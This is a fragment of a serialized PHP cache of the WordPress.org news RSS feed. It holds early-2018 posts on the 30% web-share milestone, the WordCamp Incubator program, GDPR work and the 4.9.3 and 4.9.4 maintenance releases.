";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:34:"The Month in WordPress: March 2018";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:69:"https://wordpress.org/news/2018/04/the-month-in-wordpress-march-2018/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 02 Apr 2018 08:00:22 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:18:"Month in WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=5632";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:317:"With a significant new milestone and some great improvements to WordPress as a platform, this month has been an important one for the project. Read on to find out more about what happened during the month of March. WordPress Now Powers 30% of the Internet Over the last 15 years, the popularity and usage of [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Hugh Lashbrooke";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:4328:"<p>With a significant new milestone and some great improvements to WordPress as a platform, this month has been an important one for the project. Read on to find out more about what happened during the month of March.\n\n</p>\n\n<hr class="wp-block-separator" />\n\n<h2>WordPress Now Powers 30% of the Internet</h2>\n\n<p>Over the last 15 years, the popularity and usage of WordPress has been steadily growing. That growth hit a significant milestone this month when <a href="https://w3techs.com/technologies/details/cm-wordpress/all/all">W3Techs reported that WordPress now powers over 30% of sites on the web.</a></p>\n\n<p>The percentage is determined based on W3Techs’ review of the top 10 million sites on the web, and it’s a strong indicator of the popularity and flexibility of WordPress as a platform.</p>\n\n<p>If you would like to have hand in helping to grow WordPress even further, <a href="https://make.wordpress.org/">you can get involved today</a>.</p>\n\n<h2>WordPress Jargon Glossary Goes Live</h2>\n\n<p>The WordPress Marketing Team has been hard at work lately putting together <a href="https://make.wordpress.org/marketing/2018/02/28/wordpress-jargon-glossary/">a comprehensive glossary of WordPress jargon</a> to help newcomers to the project become more easily acquainted with things.</p>\n\n<p>The glossary <a href="https://make.wordpress.org/marketing/2018/02/28/wordpress-jargon-glossary/">is available here</a> along with a downloadable PDF to make it simpler to reference offline.</p>\n\n<p>Publishing this resource is part of an overall effort to make WordPress more easily accessible for people who are not so familiar with the project. If you would like to assist the Marketing Team with this, you can follow <a href="https://make.wordpress.org/marketing/">the team blog</a> and join the #marketing channel in the<a href="https://make.wordpress.org/chat/"> Making WordPress Slack group</a>.</p>\n\n<h2>Focusing on Privacy in WordPress</h2>\n\n<p>Online privacy has been in the news this month for all the wrong reasons. It has reinforced the commitment of the GDPR Compliance Team to continue working on enhancements to WordPress core that allow site owners to improve privacy standards.</p>\n\n<p>The team&#x27;s work, and the wider privacy project, spans four areas: Adding tools which will allow site administrators to collect the information they need about their sites, examining the plugin guidelines with privacy in mind, enhancing privacy standards in WordPress core, and creating documentation focused on best practices in online privacy.</p>\n\n<p>To get involved with the project, you can <a href="https://make.wordpress.org/core/2018/03/28/roadmap-tools-for-gdpr-compliance/">view the roadmap</a>, <a href="https://make.wordpress.org/core/tag/gdpr-compliance/">follow the updates</a>, <a href="https://core.trac.wordpress.org/query?status=!closed&amp;keywords=~gdpr">submit patches</a>, and join the #gdpr-compliance channel in the <a href="https://make.wordpress.org/chat">Making WordPress Slack group</a>. Office hours are 15:00 UTC on Wednesdays.</p>\n\n<hr class="wp-block-separator" />\n\n<h2>Further Reading:</h2>\n\n<ul>\n    <li>The WordPress Foundation has published <a href="https://wordpressfoundation.org/2017-annual-report/">their annual report for 2017</a> showing just how much the community has grown over the last year.</li>\n    <li>The dates for WordCamp US <a href="https://2018.us.wordcamp.org/2018/03/13/announcing-wordcamp-us-2018/">have been announced</a> — this flagship WordCamp event will be held on 7-9 December this year in Nashville, Tennessee.</li>\n    <li>WordPress 4.9.5 is due for release on April 3 — <a href="https://make.wordpress.org/core/2018/03/21/wordpress-4-9-5-beta/">find out more here</a>.</li>\n    <li>Version 2.5 of Gutenberg, the new editor for WordPress core, <a href="https://make.wordpress.org/core/2018/03/29/whats-new-in-gutenberg-29th-march/">was released this month</a> with a host of great improvements.</li>\n    <li>WordSesh, a virtual WordPress conference, <a href="http://wordsesh.com/">is returning in July this year</a>.</li>\n</ul>\n\n<p><em>If you have a story we should consider including in the next “Month in WordPress” post, please <a href="https://make.wordpress.org/community/month-in-wordpress-submissions/">submit it here</a>.</em><br /></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"5632";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:37:"The Month in WordPress: February 2018";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:72:"https://wordpress.org/news/2018/03/the-month-in-wordpress-february-2018/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 01 Mar 2018 08:41:04 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:18:"Month in WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=5613";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:324:"Judging by the flurry of activity across the WordPress project throughout February, it looks like everyone is really getting into the swing of things for 2018. There have been a lot of interesting new developments, so read on to see what the community has been up to for the past month. WordPress 4.9.3 &#38; 4.9.4 [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Hugh Lashbrooke";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:5936:"<p>Judging by the flurry of activity across the WordPress project throughout February, it looks like everyone is really getting into the swing of things for 2018. There have been a lot of interesting new developments, so read on to see what the community has been up to for the past month.</p>\n\n<hr class="wp-block-separator" />\n\n<h2>WordPress 4.9.3 &amp; 4.9.4</h2>\n\n<p>Early in the month, <a href="https://wordpress.org/news/2018/02/wordpress-4-9-3-maintenance-release/">version 4.9.3 of WordPress was released</a>, including a number of important bug fixes. Unfortunately it introduced a bug that prevented many sites from automatically updating to future releases. To remedy this issue, <a href="https://wordpress.org/news/2018/02/wordpress-4-9-4-maintenance-release/">version 4.9.4 was released</a> the following day requiring many people to manually update their sites.</p>\n\n<p>While this kind of issue is always regrettable, the good thing is that it was fixed quickly, and that not all sites had updated to 4.9.3 yet, which meant they bypassed the bug in that version.</p>\n\n<p>You can find out more technical information about this issue <a href="https://make.wordpress.org/core/2018/02/06/wordpress-4-9-4-release-the-technical-details/">on the Core development blog</a>.</p>\n\n<h2>The WordCamp Incubator is Back</h2>\n\n<p>In 2016, the Global Community Team ran an experimental program to help spread WordPress to underserved areas by providing more significant organizing support for their first WordCamp event. This program was dubbed the WordCamp Incubator, and it was so successful in the three cities where it ran that <a href="https://wordpress.org/news/2018/02/wordcamp-incubator-2-0/">the program is back for 2018</a>.</p>\n\n<p>Right now, the Community Team is looking for cities to be a part of this year’s incubator by <a href="https://wordcampcentral.polldaddy.com/s/wordcamp-incubator-program-2018-city-application">taking applications</a>. Additionally, each incubator community will need an experienced WordCamp organizer to assist them as a co-lead organizer for their event — if that sounds interesting to you, then you can <a href="https://wordcampcentral.polldaddy.com/s/wordcamp-incubator-program-2018-co-lead-application">fill in the application form for co-leads</a>.</p>\n\n<p>You can find out further information about the WordCamp Incubator <a href="https://make.wordpress.org/community/2018/02/19/wordcamp-incubator-program-2018-announcement/">on the Community Team blog</a>.</p>\n\n<h2>WordPress Meetup Roundtables scheduled for March</h2>\n\n<p>In order to assist local WordPress meetup organizers with running their meetup groups, some members of the Community Team have organized <a href="https://make.wordpress.org/community/2018/02/23/wordpress-meetup-roundtables-scheduled-for-march/">weekly meetup roundtable discussions through the month of March</a>.</p>\n\n<p>These will be run as video chats at 16:00 UTC every Wednesday this month and will be a great place for meetup organizers to come together and help each other out with practical ideas and advice.</p>\n\n<p>If you are not already in the WordPress meetup program and would like to join, you can find out more information in <a href="https://make.wordpress.org/community/handbook/meetup-organizer/welcome/">the WordPress Meetup Organizer Handbook</a>.</p>\n\n<h2>GDPR Compliance in WordPress Core</h2>\n\n<p>The General Data Protection Regulation (GDPR) is an upcoming regulation that will affect all online services across Europe. In order to prepare for this, a working group has been formed to make sure that WordPress is compliant with the GDPR regulations.</p>\n\n<p>Aside from the fact that this will be a requirement for the project going forward, it will also have an important and significant impact on the privacy and security of WordPress as a whole. The working group has posted <a href="https://make.wordpress.org/core/2018/02/19/proposed-roadmap-tools-for-gdpr-compliance/">their proposed roadmap</a> for this project and it looks very promising.</p>\n\n<p>To get involved in building WordPress Core, jump into the #gdpr-compliance channel in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a>, and follow <a href="https://make.wordpress.org/core/">the Core team blog</a>.</p>\n\n<hr class="wp-block-separator" />\n\n<h2>Further Reading:</h2>\n\n<ul>\n    <li>WPShout published <a href="https://wpshout.com/complete-guide-wordpress-security/">a thorough guide to WordPress security</a>.</li>\n    <li>The Community Team has published interesting statistics from the WordCamp program in <a href="https://make.wordpress.org/community/2018/02/27/wordcamps-in-2016/">2016</a> and <a href="https://make.wordpress.org/community/2018/02/28/wordcamps-in-2017/">2017</a>.</li>\n    <li><a href="https://make.wordpress.org/community/2018/02/15/potential-addition-of-a-new-onboarding-team/">An intriguing proposal has been made</a> for a new ‘Onboarding’ team to be started in the WordPress project.</li>\n    <li>The new editing experience for WordPress, named Gutenberg, continues to be actively developed with <a href="https://make.wordpress.org/core/2018/02/16/whats-new-in-gutenberg-16th-february/">a feature-packed release</a> this past month.</li>\n    <li>The Advanced WordPress Facebook group <a href="https://www.youtube.com/watch?v=4vS_jR5-nIo">held an interview with WordPress co-founder, Matt Mullenweg</a> about the Gutenberg project.</li>\n    <li><a href="https://make.wordpress.org/meta/2018/02/27/two-factor-authentication-on-wp-org/">Two factor authentication is on its way to the WordPress.org network</a> — this will be a great improvement to the overall security of the project.</li>\n</ul>\n\n<p><em>If you have a story we should consider including in the next “Month in WordPress” post, please <a href="https://make.wordpress.org/community/month-in-wordpress-submissions/">submit it here</a>.</em></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"5613";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:5;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n				\n		\n		\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:22:"WordCamp Incubator 2.0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:58:"https://wordpress.org/news/2018/02/wordcamp-incubator-2-0/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 21 Feb 2018 22:53:20 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:3:{i:0;a:5:{s:4:"data";s:9:"Community";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:6:"Events";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:8:"WordCamp";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=5577";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:343:"WordCamps are informal, community-organized events that are put together by a team of local WordPress users who have a passion for growing their communities. They are born out of active WordPress meetup groups that meet regularly and are able to host an annual WordCamp event. This has worked very well in many communities, with over [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Hugh Lashbrooke";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2450:"<p><a href="https://central.wordcamp.org/">WordCamps</a> are informal, community-organized events that are put together by a team of local WordPress users who have a passion for growing their communities. They are born out of active WordPress meetup groups that meet regularly and are able to host an annual WordCamp event. This has worked very well in many communities, with over 120 WordCamps being hosted around the world in 2017.<br /></p>\n\n<p>Sometimes though, passionate and enthusiastic community members can’t pull together enough people in their community to make a WordCamp happen. To address this, we introduced <a href="https://wordpress.org/news/2016/02/experiment-wordcamp-incubator/">the WordCamp Incubator program</a> in 2016.<br /></p>\n\n<p>The goal of the incubator program is <strong>to help spread WordPress to underserved areas by providing more significant organizing support for their first WordCamp event.</strong> In 2016, members of <a href="https://make.wordpress.org/community/">the global community team</a> worked with volunteers in three cities — Denpasar, Harare and Medellín — giving direct, hands-on assistance in making local WordCamps possible. All three of these WordCamp incubators <a href="https://make.wordpress.org/community/2017/06/30/wordcamp-incubator-report/">were a great success</a>, so we&#x27;re bringing the incubator program back for 2018.<br /></p>\n\n<p>Where should the next WordCamp incubators be? If you have always wanted a WordCamp in your city but haven’t been able to get a community started, this is a great opportunity. We will be taking applications for the next few weeks, then will get in touch with everyone who applied to discuss the possibilities. We will announce the chosen cities by the end of March.<br /></p>\n\n<p><strong>To apply, </strong><a href="https://wordcampcentral.polldaddy.com/s/wordcamp-incubator-program-2018-city-application"><strong>fill in the application</strong></a><strong> by March 15, 2018.</strong> You don’t need to have any specific information handy, it’s just a form to let us know you’re interested. You can apply to nominate your city even if you don’t want to be the main organizer, but for this to work well we will need local liaisons and volunteers, so please only nominate cities where you live or work so that we have at least one local connection to begin.<br /></p>\n\n<p>We&#x27;re looking forward to hearing from you!<br /></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"5577";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:6;a:6:{s:4:"data";s:36:"\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:35:"WordPress 4.9.4 Maintenance Release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:71:"https://wordpress.org/news/2018/02/wordpress-4-9-4-maintenance-release/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 06 Feb 2018 16:17:55 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:2:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:3:"4.9";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=5559";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:350:"WordPress 4.9.4 is now available. This maintenance release fixes a severe bug in 4.9.3, which will cause sites that support automatic background updates to fail to update automatically, and will require action from you (or your host) for it to be updated to 4.9.4. Four years ago with WordPress 3.7 &#8220;Basie&#8221;, we added the ability [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:10:"Dion Hulse";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:1823:"<p>WordPress 4.9.4 is now available.</p>\n<p>This maintenance release fixes a severe bug in 4.9.3, which will cause sites that support automatic background updates to fail to update automatically, and will require action from you (or your host) for it to be updated to 4.9.4.</p>\n<p>Four years ago with <a href="https://wordpress.org/news/2013/10/basie/">WordPress 3.7 &#8220;Basie&#8221;</a>, we added the ability for WordPress to self-update, keeping your website secure and bug-free, even when you weren&#8217;t available to do it yourself. For four years it&#8217;s helped keep millions of installs updated with very few issues over that time. Unfortunately <a href="https://wordpress.org/news/2018/02/wordpress-4-9-3-maintenance-release/">yesterdays 4.9.3 release</a> contained a severe bug which was only discovered after release. The bug will cause WordPress to encounter an error when it attempts to update itself to WordPress 4.9.4, and will require an update to be performed through the WordPress dashboard or hosts update tools.</p>\n<p>WordPress managed hosting companies who install updates automatically for their customers can install the update as normal, and we&#8217;ll be working with other hosts to ensure that as many customers of theirs who can be automatically updated to WordPress 4.9.4 can be.</p>\n<p>For more technical details of the issue, we&#8217;ve <a href="https://make.wordpress.org/core/2018/02/06/wordpress-4-9-4-release-the-technical-details/">posted on our Core Development blog</a>. For a full list of changes, consult the <a href="https://core.trac.wordpress.org/query?status=closed&amp;milestone=4.9.4&amp;group=component">list of tickets</a>.</p>\n<p><a href="https://wordpress.org/download/">Download WordPress 4.9.4</a> or visit Dashboard → Updates and click “Update Now.”</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"5559";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:7;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:35:"WordPress 4.9.3 Maintenance Release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:71:"https://wordpress.org/news/2018/02/wordpress-4-9-3-maintenance-release/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 05 Feb 2018 19:47:45 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=5545";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:372:"WordPress 4.9.3 is now available. This maintenance release fixes 34 bugs in 4.9, including fixes for Customizer changesets, widgets, visual editor, and PHP 7.2 compatibility. For a full list of changes, consult the list of tickets and the changelog. Download WordPress 4.9.3 or visit Dashboard → Updates and click “Update Now.” Sites that support automatic [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Sergey Biryukov";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3421:"<p>WordPress 4.9.3 is now available.</p>\n<p>This maintenance release fixes 34 bugs in 4.9, including fixes for Customizer changesets, widgets, visual editor, and PHP 7.2 compatibility. For a full list of changes, consult the <a href="https://core.trac.wordpress.org/query?status=closed&amp;milestone=4.9.3&amp;group=component">list of tickets</a> and the <a href="https://core.trac.wordpress.org/log/branches/4.9?rev=42630&amp;stop_rev=42521">changelog</a>.</p>\n<p><a href="https://wordpress.org/download/">Download WordPress 4.9.3</a> or visit Dashboard → Updates and click “Update Now.” Sites that support automatic background updates are already beginning to update automatically.</p>\n<p>Thank you to everyone who contributed to WordPress 4.9.3:</p>\n<p><a href="https://profiles.wordpress.org/jorbin/">Aaron Jorbin</a>, <a href="https://profiles.wordpress.org/abdullahramzan/">abdullahramzan</a>, <a href="https://profiles.wordpress.org/adamsilverstein/">Adam Silverstein</a>, <a href="https://profiles.wordpress.org/afercia/">Andrea Fercia</a>, <a href="https://profiles.wordpress.org/andreiglingeanu/">andreiglingeanu</a>, <a href="https://profiles.wordpress.org/azaozz/">Andrew Ozz</a>, <a href="https://profiles.wordpress.org/bpayton/">Brandon Payton</a>, <a href="https://profiles.wordpress.org/chetan200891/">Chetan Prajapati</a>, <a href="https://profiles.wordpress.org/coleh/">coleh</a>, <a href="https://profiles.wordpress.org/darko-a7/">Darko A7</a>, <a href="https://profiles.wordpress.org/desertsnowman/">David Cramer</a>, <a href="https://profiles.wordpress.org/dlh/">David Herrera</a>, <a href="https://profiles.wordpress.org/dd32/">Dion Hulse</a>, <a href="https://profiles.wordpress.org/flixos90/">Felix Arntz</a>, <a href="https://profiles.wordpress.org/frank-klein/">Frank Klein</a>, <a href="https://profiles.wordpress.org/pento/">Gary Pendergast</a>, <a href="https://profiles.wordpress.org/audrasjb/">Jb Audras</a>, <a href="https://profiles.wordpress.org/jbpaul17/">Jeffrey Paul</a>, <a href="https://profiles.wordpress.org/lizkarkoski/">lizkarkoski</a>, <a href="https://profiles.wordpress.org/clorith/">Marius L. J.</a>, <a href="https://profiles.wordpress.org/mattyrob/">mattyrob</a>, <a href="https://profiles.wordpress.org/monikarao/">Monika Rao</a>, <a href="https://profiles.wordpress.org/munyagu/">munyagu</a>, <a href="https://profiles.wordpress.org/ndavison/">ndavison</a>, <a href="https://profiles.wordpress.org/nickmomrik/">Nick Momrik</a>, <a href="https://profiles.wordpress.org/peterwilsoncc/">Peter Wilson</a>, <a href="https://profiles.wordpress.org/rachelbaker/">Rachel Baker</a>, <a href="https://profiles.wordpress.org/rishishah/">rishishah</a>, <a href="https://profiles.wordpress.org/othellobloke/">Ryan Paul</a>, <a href="https://profiles.wordpress.org/sasiddiqui/">Sami Ahmed Siddiqui</a>, <a href="https://profiles.wordpress.org/sayedwp/">Sayed Taqui</a>, <a href="https://profiles.wordpress.org/seanchayes/">Sean Hayes</a>, <a href="https://profiles.wordpress.org/sergeybiryukov/">Sergey Biryukov</a>, <a href="https://profiles.wordpress.org/shooper/">Shawn Hooper</a>, <a href="https://profiles.wordpress.org/netweb/">Stephen Edgar</a>, <a href="https://profiles.wordpress.org/manikmist09/">Sultan Nasir Uddin</a>, <a href="https://profiles.wordpress.org/tigertech/">tigertech</a>, and <a href="https://profiles.wordpress.org/westonruter/">Weston Ruter</a>.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"5545";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:8;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:36:"The Month in WordPress: January 2018";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:71:"https://wordpress.org/news/2018/02/the-month-in-wordpress-january-2018/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 02 Feb 2018 08:10:07 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:18:"Month in 